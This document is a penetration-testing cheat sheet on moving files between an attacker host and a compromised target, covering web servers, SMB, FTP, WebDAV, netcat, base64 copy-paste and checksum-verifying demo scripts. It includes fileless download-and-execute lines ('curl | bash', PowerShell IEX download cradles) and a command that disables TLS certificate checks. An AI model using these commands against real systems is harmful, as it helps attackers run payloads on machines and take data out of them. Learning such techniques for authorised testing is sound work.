Transfer files 🛅


We will often want to transfer files between our machine and the target, mostly during privilege escalation and post-exploitation.

Depending on what the target offers (e.g. installed tools) and what it restricts (e.g. firewall rules on inbound or outbound ports), we will have to use different techniques.

The most common approaches from the host to the target:

  • Copy-pasting (short text files) ✂️
  • Python web server (using wget/cURL/iwr as client) 🐍

📚 There are also fileless techniques that avoid writing the file to the target's disk, such as curl xxx | bash or similar tricks.

Transferring a file from the target back to the host is usually harder, because the target is rarely allowed to listen and often lacks tooling. Some common approaches are:

  • Copy-pasting (short text files) ✂️
  • Moving files to the target's web root, then downloading them (if applicable) 📂
  • Python web server started on the target (often available on Linux) 🐍
  • Using services such as SCP/FTP/SMB/NFS/... (if present) 🎡
  • Using installed tools such as nc, php, etc. 🧯

Compare a checksum of the file on both ends (e.g. sha256sum on Linux, Get-FileHash on Windows) to check that it was transferred intact; this matters most after copy-paste or raw netcat transfers, which silently truncate or mangle data. Refer to cryptography/hashing/checksum.


Sending a file to others 🔒

On the "host" where the file is:

Python webserver 🐍

Start a webserver so that clients can download files from the current directory. If python is unavailable, try python2 or python3 explicitly.

$ python2.7 -m SimpleHTTPServer                    # python 2, port 8000 by default
$ python -m http.server port                       # port > 1023; serves the current directory
$ python [...] --directory /path/to/server/root    # python >= 3.7
$ sudo python -m http.server port                  # port <= 1023 requires root

Upload To SMB Share

You can use copy (or robocopy, which takes a source directory, a destination directory and a file pattern, not a single file path) to upload a file to a share exposed by the host:

PS> copy file.txt \\HOST_IP\share_name\path
PS> robocopy C:\path\to\dir \\HOST_IP\share_name\path file.txt

If guest access is not allowed, map the share with explicit credentials first, then copy to the mapped drive.

Upload To FTP Server

You can upload to the URL ftp://HOST_IP/<target_file_name> with .NET's WebClient, or use the built-in Windows ftp.exe client (-n disables auto-login, -v hides server replies). Note that ftp.exe only speaks active-mode FTP, so the host (the FTP server) must be able to open the data connection back to the target; inbound filtering on the target is a common reason dir or put hangs. To run it non-interactively, feed the same commands from a file with ftp -s:<file>.

PS> (New-Object Net.WebClient).UploadFile('ftp://X/abc', 'C:\path\to\abc')
PS> ftp -v -n
ftp> open IP
ftp> user anonymous
password: <blank>
ftp> dir # list files
ftp> put <file>
ftp> bye

Other webservers 🎡

You may leverage an installed web development tool/package to start a webserver allowing clients to download files from the current directory. Bind to 0.0.0.0 (or the interface facing the target), not 127.0.0.1, or the target will not be able to reach it:

$ php -S 0.0.0.0:8080       # php built-in server
$ http-server -p 8080       # node "http-server" package
$ ruby -run -ehttpd . -p8080

Receiving/Fetching a file 🔑

On the "client" that needs the file:

Using Common Utilities

The wget command exists on both Linux and Windows, but on Windows PowerShell 5.1 wget and curl are only aliases of Invoke-WebRequest (iwr) and take that cmdlet's parameters; PowerShell 6+ removed those aliases, and recent Windows builds ship a real curl.exe. On Linux, mind the case of the output option: -O writes the file, lowercase -o only writes the log.

$ # Download on Linux
$ wget HOST_IP:port/script.sh -O /tmp/script.sh
PS> # Download on Windows (iwr alias)
PS> wget HOST_IP:port/script.ps1 -OutFile $Env:TMP\script.ps1

You may have to use curl or iwr (Windows-only) instead of wget.

$ curl HOST_IP:port/script.sh -o /tmp/script.sh
PS> curl HOST_IP:port/script.ps1 -o $Env:TMP\script.ps1    # -o works for both the iwr alias and curl.exe
PS> iwr HOST_IP:port/script.ps1 -OutFile $Env:TMP\script.ps1
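The host/client procedure from the two sections above (python -m http.server on the host, wget/curl on the client, then a checksum before the file is trusted), run end to end on one machine. This is an added example written for this page, not code from the original notes. It assumes python3 >= 3.7 (for --directory), curl or wget, and a free random high port on 127.0.0.1; the function names, the served directory and the payload script.sh are constructed for the demo.

```shell
#!/usr/bin/env bash
# Added example, not part of the original notes. Assumes python3 >= 3.7,
# curl or wget, and that a random high port on 127.0.0.1 is free.
set -u

# SHA-256 of a file (coreutils sha256sum, or shasum on BSD/macOS).
sha256_of() { (sha256sum "$1" 2>/dev/null || shasum -a 256 "$1") | cut -d' ' -f1; }

# Host side: serve directory $1 on 127.0.0.1:$2 in the background.
# In the field you would bind 0.0.0.0 so the target can reach it.
SERVER_PID=""
serve_dir() {
    python3 -m http.server "$2" --bind 127.0.0.1 --directory "$1" >/dev/null 2>&1 &
    SERVER_PID=$!
}

# Client side: download URL $1 to $2 with whatever is installed (curl, else wget).
# Note the capital -O for wget: lowercase -o is the log file, not the output.
fetch() {
    if command -v curl >/dev/null 2>&1; then
        curl -fsS -o "$2" "$1"
    else
        wget -qO "$2" "$1"
    fi
}

# Download $1 to $2 and keep it only if its SHA-256 is $3 (the hash you read
# off the host); a truncated or tampered download is deleted instead.
fetch_verified() {
    fetch "$1" "$2" || return 2
    [ "$(sha256_of "$2")" = "$3" ] && return 0
    rm -f "$2"
    return 1
}

# Self-contained run with a constructed payload: serve, poll until the listener
# is up, fetch+verify, tear down. Returns 0 only if the verified copy matched.
demo() {
    local work port expected url rc i
    rc=1
    work=$(mktemp -d) && mkdir "$work/srv"
    printf '#!/bin/sh\necho constructed payload\n' > "$work/srv/script.sh"
    expected=$(sha256_of "$work/srv/script.sh")
    port=$(( 20000 + $$ % 20000 ))
    serve_dir "$work/srv" "$port"
    url="http://127.0.0.1:$port/script.sh"
    for i in 1 2 3 4 5 6 7 8 9 10; do        # give http.server up to ~10 s to bind
        if fetch_verified "$url" "$work/script.sh" "$expected"; then rc=0; break; fi
        sleep 1
    done
    kill "$SERVER_PID" 2>/dev/null; wait "$SERVER_PID" 2>/dev/null || true
    rm -rf "$work"
    return "$rc"
}

demo && echo "verified copy matched the served file"
```

fetch_verified is the part worth keeping in your own notes: the hash is read from the host before the download, so a truncated transfer (common when a web shell times out) or a file swapped on the wire is never left on disk under the expected name.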

Host A Simple Upload Server

Run a webserver with an upload form, such as the uploadserver package (it serves the current directory like http.server, listens on port 8000 by default, and accepts multipart POSTs on /upload):

$ pip3 install uploadserver
$ python3 -m uploadserver
$ sudo python3 -m uploadserver 443 --server-certificate cert.pem   # HTTPS; port 443 needs root

And make the client use it to upload the file, either through the form in a browser or with a multipart POST to /upload.

Download From SMB Share

You can use copy (or robocopy with a source directory, a destination directory and a file pattern) to download a file from a share:

PS> copy \\HOST_IP\share_name\file_path .
PS> robocopy \\HOST_IP\share_name\dir_path . file.txt

If guest access is not allowed, map the share with explicit credentials first.

Download From FTP Server

You can use the URL ftp://HOST_IP/<file_name> with a client that understands ftp:// URLs (wget, curl, .NET WebClient.DownloadFile) or the built-in Windows ftp.exe client (active mode only, so the target must accept the data connection from the host):

PS> ftp -v -n
ftp> open IP
ftp> user anonymous
password: <blank>
ftp> dir # list files
ftp> get <file>
ftp> bye

Windows Utilities

A few Windows commands/tools we can use:

PS> # reported to be faster than iwr/curl/wget
PS> (New-Object Net.WebClient).DownloadFile('URL','OUTPUT')
PS> (New-Object Net.WebClient).DownloadFileAsync('URL','OUTPUT')
PS> IEX (New-Object Net.WebClient).DownloadString('URL')   # fileless: runs the script without writing it to disk

➡️ See also: DownloadCradles.ps1. Add -UseBasicParsing to iwr if it fails because of the Internet Explorer parsing engine. To skip certificate validation when your host serves over HTTPS with a self-signed certificate (this turns off TLS authentication for the whole process, not encryption):

PS> [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}

Additional Elements

services 🕳️

You may use FTP/SCP/NFS/SMB/... if applicable.

An alternative to SMB that runs over HTTP is WebDAV, handy when TCP/445 is filtered but web traffic is allowed. UNC access to a WebDAV share needs the WebClient service running on the target, and for a port other than 80 the UNC form is \\IP@8080\DavWWWRoot.

$ sudo apt install python3-wsgidav
$ wsgidav --host=0.0.0.0 --port=8080 --root=/tmp/smbshare --auth=anonymous
PS> iwr -Uri "http://IP:8080/<file>" -OutFile <file>
PS> copy \\IP\DavWWWRoot\<file> # 👻 // didn't work

We may be able to mount a local folder as a drive inside the RDP session. On Windows, the mstsc client exposes this under Local Resources; the Linux clients take it on the command line:

$ rdesktop [...] -r disk:linux='/path/to/folder'
$ xfreerdp [...] /drive:linux,/path/to/folder

netcat 🐈

Start the receiving side first, then push the file into it. With traditional nc, -q 0 makes the sender exit once stdin hits EOF; with ncat use --send-only / --recv-only instead. Raw nc gives no integrity check, so compare checksums afterwards.

# client (receiver), started first
$ nc -lvp port > file.sh
# host (sender)
$ nc -q 0 CLIENT_IP port < file.sh

Copy-paste ✂️

Copy-paste may be an option, but not every file can be copy-pasted (binaries, anything with non-printable bytes). One trick is to base64-encode the file on the host, paste the base64 text into a file on the target, and decode it there; compare a checksum afterwards, since terminals and web shells easily drop or wrap characters.
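The base64 copy-paste trick together with the checksum check mentioned earlier, as an added example written for this page (not code from the original notes). Host side, paste_encode prints the expected SHA-256 followed by the base64 body wrapped at 76 columns; target side, paste_decode reads exactly that text from stdin, decodes it and refuses a copy whose hash does not match. It assumes coreutils (base64, fold, cmp) with sha256sum or shasum available on both ends; the function names and the binary sample file are constructed.

```shell
#!/usr/bin/env bash
# Added example, not part of the original notes. Assumes base64/fold/cmp and
# sha256sum (or shasum); the binary sample below is constructed.
set -u

# SHA-256 of a file (coreutils sha256sum, or shasum on BSD/macOS).
sha256_of() { (sha256sum "$1" 2>/dev/null || shasum -a 256 "$1") | cut -d' ' -f1; }

# Host side: print the clipboard payload: expected hash on the first line, then
# the base64 body wrapped at 76 columns. Do not use `base64 -w 0` here; web
# shells and terminal multiplexers tend to truncate very long single lines.
paste_encode() {
    sha256_of "$1"
    base64 "$1" | fold -w 76
}

# Target side: read the pasted payload from stdin, decode it into $1 and compare
# the hash; a blob that lost or gained characters on the way is deleted, not kept.
paste_decode() {
    local dst="$1" expected got
    read -r expected || return 2
    base64 -d > "$dst" || { rm -f "$dst"; return 2; }   # newlines from fold are ignored
    got=$(sha256_of "$dst")
    if [ "$got" != "$expected" ]; then
        echo "checksum mismatch: expected $expected, got $got" >&2
        rm -f "$dst"
        return 1
    fi
    echo "$got"
}

# Self-contained round trip with a constructed file that cannot be pasted raw
# (it contains a NUL and a 0xFF byte). Returns 0 if the decoded copy is identical.
demo_roundtrip() {
    local work src dst blob rc
    work=$(mktemp -d)
    src="$work/tool.bin"; dst="$work/tool.pasted"
    printf 'ELF\000\001\377 constructed payload\n' > "$src"
    blob=$(paste_encode "$src")                              # what you would copy on the host ...
    printf '%s\n' "$blob" | paste_decode "$dst" >/dev/null   # ... and paste on the target
    rc=$?
    [ "$rc" -eq 0 ] && cmp -s "$src" "$dst" || rc=1
    rm -rf "$work"
    return "$rc"
}

demo_roundtrip && echo "round trip ok"
```

Putting the hash on the first line of the pasted blob means the target-side check needs nothing beyond what was pasted; on a Windows target the same blob decodes with certutil -decode after stripping that first line, and Get-FileHash gives the value to compare.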


Fileless payloads 👻

On Linux, we often use a pipe (|):

$ curl [...] | bash
$ wget -qO- [...] | bash
$ [...] | python3

On Windows, we often use:

PS> IEX [...]
PS> [...] | IEX

👻 To-do 👻

Stuff that I found but have never read/used yet.

$ openssl s_server -quiet -accept 80 -cert cert.pem -key key.pem < file
$ openssl s_client -connect IP:80 -quiet > file